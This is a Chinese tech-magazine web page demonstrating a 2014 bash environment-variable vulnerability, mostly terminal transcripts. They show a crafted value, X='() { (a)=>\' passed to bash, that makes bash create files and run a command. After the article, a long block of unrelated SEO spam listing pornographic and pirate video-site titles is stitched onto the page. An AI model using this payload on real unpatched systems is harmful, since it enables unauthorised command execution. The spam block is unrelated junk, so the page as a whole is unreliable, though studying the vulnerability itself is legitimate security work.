《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 99久久精品费精品国产| 色狠狠一区二区三区香蕉| 2020天堂中文字幕一区在线观| 91精品国产三级在线观看| 88av免费观看入口在线| 182tv午夜精品视频在线播放 | 亚洲一区二区三区四区视频 | 欧美群交在线播放1| 欧美一级va在线视频免费播放| 曰批全过程免费视频观看免费软件| 日韩人妻不卡一区二区三区| 欧美日本一道高清免费3区| 美女洗澡一级毛片| 精品中文字幕一区在线| 精品一区二区久久久久久久网站 | 嫩草影院精品视频在线观看| 小h片在线播放| 在线观看国产一区二区三区| 国产激情电影综合在线看| 国产午夜精品一区二区三区不卡| 噜噜噜噜天天狠狠| 亚洲熟女乱色一区二区三区| 午夜精品久久久久久久99| 免费99精品国产自在现线| 亚洲成人aaa| 久久婷婷五月综合尤物色国产 | 国产一级片在线播放| 免费黄色一级电影| 亚洲欧美日韩在线不卡| 亚洲熟妇AV乱码在线观看| 免费黄色网址在线观看| 亚洲资源在线视频| 免费在线观看污网站| 亚洲色图欧美激情| 亚洲精品自拍视频| 再深点灬舒服灬太大了老板| 伊人久久大线蕉香港三级| 亚洲韩精品欧美一区二区三区| 亚洲欧美中文字幕在线网站| 亚洲xxxxxx| 久久亚洲国产精品五月天婷|